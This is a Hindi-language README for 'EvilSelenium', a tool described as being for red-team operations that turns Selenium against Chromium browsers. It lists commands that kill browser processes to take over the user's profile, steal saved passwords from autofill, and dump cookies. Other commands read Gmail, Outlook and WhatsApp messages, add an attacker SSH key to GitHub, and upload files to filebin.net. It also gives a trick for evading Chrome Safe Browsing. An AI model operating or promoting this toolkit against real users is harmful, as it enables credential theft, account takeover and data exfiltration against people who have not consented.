
Selenium को हथियार बनाकर क्रेडेंशियल चोरी, कुकी डंपिंग, ईमेल एक्सफिल्ट्रेशन और Chromium ब्राउज़रों से फ़ाइल निष्कर्षण को स्वचालित करता है, जो रेड टीम ऑपरेशन के लिए है।
EvilSelenium एक नया प्रोजेक्ट है जो Chromium-आधारित ब्राउज़रों का दुरुपयोग करने के लिए Selenium को हथियार बनाता है। वर्तमान में उपलब्ध विशेषताएँ इस प्रकार हैं:
या अपनी आवश्यकताओं के अनुसार मौजूदा कार्यक्षमता का विस्तार करें (जैसे उपयोगकर्ता के GDrive/OneDrive से फ़ाइलें डाउनलोड करना)।
जब यह टूल चलाया जाता है, तो यह मौजूदा ब्राउज़र प्रक्रियाओं को समाप्त कर देगा ताकि उपयोगकर्ता के ब्राउज़र प्रोफ़ाइल के साथ चल सके, जिसमें पासवर्ड और सक्रिय सत्र होते हैं।
मैंने इस टूल को लगभग एक सप्ताह में बनाया और जितने परीक्षण चाहिए थे उतने नहीं किए, इसलिए कुछ बग हो सकते हैं।
Selenium मॉड्यूल हमेशा स्थिर नहीं होते हैं। वेबसाइटों में लगातार बदलाव के कारण कुछ मॉड्यूल कभी-कभी टूट सकते हैं। मैं मौजूदा मॉड्यूल को बनाए रखने की पूरी कोशिश करूँगा ताकि वे इच्छित रूप से काम करें, लेकिन आपको चेतावनी दी गई है।
EvilSelenium.exe /?
/help - यह सहायता मेनू दिखाएँ।
SETUP:
/install - chromedriver और Selenium webdriver इंस्टॉल करें। इसे एक बार चलाएँ।
GLOBAL: (हर कमांड के साथ स्वीकार्य)
/browserdir [appdata_local_routing] - कस्टम ब्राउज़र का उपयोग करें, इनपुट %appdatalocal% निर्देशिका के अंदर रूटिंग होना चाहिए (जैसे "Microsoft\Edge")
RECON:
/enumsavedsites [out_path] - जाँचें कि किन वेबसाइटों के लिए पासवर्ड स्क्रीनशॉट के माध्यम से सहेजे गए हैं।
/screenshot [website] [out_path] - किसी दिए गए वेबपेज का स्क्रीनशॉट लें।
CREDENTIALS:
/autorun - सामान्य वेबसाइटों से सहेजे गए क्रेडेंशियल्स निकालें।
/dynamicid [login_page] [username_id] [password_id] - किसी वेबसाइट से सहेजे गए क्रेडेंशियल्स निकालें, उपयोगकर्ता नाम फ़ील्ड ID और पासवर्ड फ़ील्ड ID प्रदान करके।
/dynamicname [login_page] [username_name] [password_name] - किसी वेबसाइट से सहेजे गए क्रेडेंशियल्स निकालें, उपयोगकर्ता नाम फ़ील्ड नाम मान और पासवर्ड नाम मान प्रदान करके।
/dynamicname2 [login_page] [username_position] [password_position] [username_name] [password_name] - किसी वेबसाइट से सहेजे गए क्रेडेंशियल्स निकालें, उपयोगकर्ता नाम फ़ील्ड नाम मान, पासवर्ड नाम मान और उनकी स्थितियाँ प्रदान करके।
COOKIES:
/cookies [website] - किसी दिए गए वेबसाइट के लिए कुकीज़ प्राप्त करता है।
MODULES:
/download [file_url] [seconds] - एक फ़ाइल डाउनलोड करें और डाउनलोड पूरा होने के लिए प्रतीक्षा करने का समय निर्दिष्ट करें। फ़ाइल एक्सटेंशन निष्पादन योग्य नहीं होने चाहिए।
/exfil [local_file] [seconds] - एक फ़ाइल को filebin.net पर अपलोड करता है और डाउनलोड लिंक आउटपुट करता है।
/gmail [out_path] [num_of_emails] - mail.google.com से ईमेल प्राप्त करता है यदि उपयोगकर्ता प्रमाणित है। अधिकतम 50 ईमेल।
/outlook [out_path] [num_of_emails] - Outlook से ईमेल प्राप्त करता है यदि उपयोगकर्ता प्रमाणित है।
/o365 [out_path] [num_of_emails] - O365 Outlook से ईमेल प्राप्त करता है यदि उपयोगकर्ता प्रमाणित है।
/github [key] - अपनी SSH कुंजी GitHub में जोड़ें यदि उपयोगकर्ता प्रमाणित है।
/whatsapp [out_path] - WhatsApp संदेश प्राप्त करता है यदि उपयोगकर्ता प्रमाणित है (BETA)।
/install कमांड Chrome Driver और Selenium WebDriver डाउनलोड करेगा, जो आवश्यक आवश्यकताएँ हैं। EvilSelenium Chrome संस्करण 100-90 पर काम करेगा।
Windows 10, Chrome v97 और v90 पर परीक्षण किया गया है।
EvilSelenium.exe /install
डिफ़ॉल्ट रूप से EvilSelenium डेटा प्राप्त करने के लिए Google Chrome के उपयोगकर्ता डेटा फ़ोल्डर का उपयोग करने का प्रयास करेगा, लेकिन अन्य Chromium-आधारित ब्राउज़र भी समर्थित हैं।
विभिन्न Chrome-आधारित ब्राउज़रों का उपयोग करने के लिए आपको %localappdata% निर्देशिका में ब्राउज़र रूटिंग के बाद /browserdir जोड़ना चाहिए।
यहाँ कुछ सामान्य ब्राउज़रों के उदाहरण दिए गए हैं (किसी भी CLI कमांड में जोड़ा जाना चाहिए):
/browserdir BraveSoftware\Brave-Browser/browserdir Microsoft\Edge/browserdir Vivaldi/enumsavedsites - यह chrome://settings/passwords के स्क्रीनशॉट लेगा।
/screenshot - किसी भी वेबसाइट का स्क्रीनशॉट लें। यदि उपयोगकर्ता वेबसाइट पर प्रमाणित है तो आपको प्रमाणित स्क्रीनशॉट मिलते हैं :)।
महत्वपूर्ण: क्रेडेंशियल मॉड्यूल ऑटोफिल से क्रेडेंशियल्स चुराने के लिए कुकीज़ हटा देगा। आदर्श रूप से, यदि आप कुकीज़ निर्यात करना चाहते हैं तो आपको अंत में क्रेडेंशियल मॉड्यूल का उपयोग करना चाहिए।
/autorun - सामान्य वेबसाइटों के लिए पूर्व-निर्मित टेम्पलेट। मैं और जोड़ता रहूँगा।
/dynamicid - लॉगिन URL के साथ उपयोगकर्ता नाम इनपुट फ़ील्ड का ID और पासवर्ड फ़ील्ड का ID प्रदान करें। यह document.getElementById() के बराबर है।
/dynamicname - यदि फ़ील्ड में ID नहीं हैं, तो फ़ील्ड के नाम मान प्रदान करें। यह नाम मान के पहले इंडेक्स का चयन करेगा। यह document.getElementsByName()[0].value के बराबर है।
/dynamicname2 - फ़ील्ड के नाम मान उनके इंडेक्स स्थिति के साथ प्रदान करें। यह document.getElementsByName()[x].value के बराबर है जहाँ x प्रदान की गई स्थिति है।
/cookies - निर्दिष्ट वेबसाइट से कुकीज़ डंप करता है।
ये अतिरिक्त मॉड्यूल हैं जो मैंने यह प्रदर्शित करने के लिए बनाए हैं कि आप Selenium के साथ किस प्रकार की क्रियाएँ कर सकते हैं।
/download - एक फ़ाइल डाउनलोड करें और डाउनलोड के लिए प्रतीक्षा करने का समय निर्दिष्ट करें। Chrome के Safebrowsing प्रॉम्प्ट से बचने के लिए डाउनलोड करने से पहले फ़ाइल में एक गैर-निष्पादन योग्य फ़ाइल एक्सटेंशन जोड़ा जाना चाहिए।
/exfil - filebin.net पर एक फ़ाइल अपलोड करता है और अपलोड पूरा होने के लिए समय निर्दिष्ट करें। एक बार अपलोड पूरा हो जाने पर फ़ाइल का डाउनलोड लिंक लिखा जाता है।
/gmail - mail.google.com से ईमेल प्राप्त करता है यदि उपयोगकर्ता प्रमाणित है। अधिकतम 50 ईमेल।
/outlook - Outlook से ईमेल प्राप्त करता है यदि उपयोगकर्ता प्रमाणित है।
/o365 - O365 Outlook से ईमेल प्राप्त करता है यदि उपयोगकर्ता प्रमाणित है।
/github - अपनी SSH कुंजी GitHub में जोड़ें यदि उपयोगकर्ता प्रमाणित है।
/whatsapp - WhatsApp संदेश प्राप्त करता है यदि उपयोगकर्ता प्रमाणित है (BETA)।
EvilSelenium.exe /screenshot https://mail.google.com c:\users\mr.d0x\downloads
EvilSelenium.exe /dynamicid https://www.hybrid-analysis.com/login login_email login_password
EvilSelenium.exe /dynamicname https://linkedin.com session_key session_password
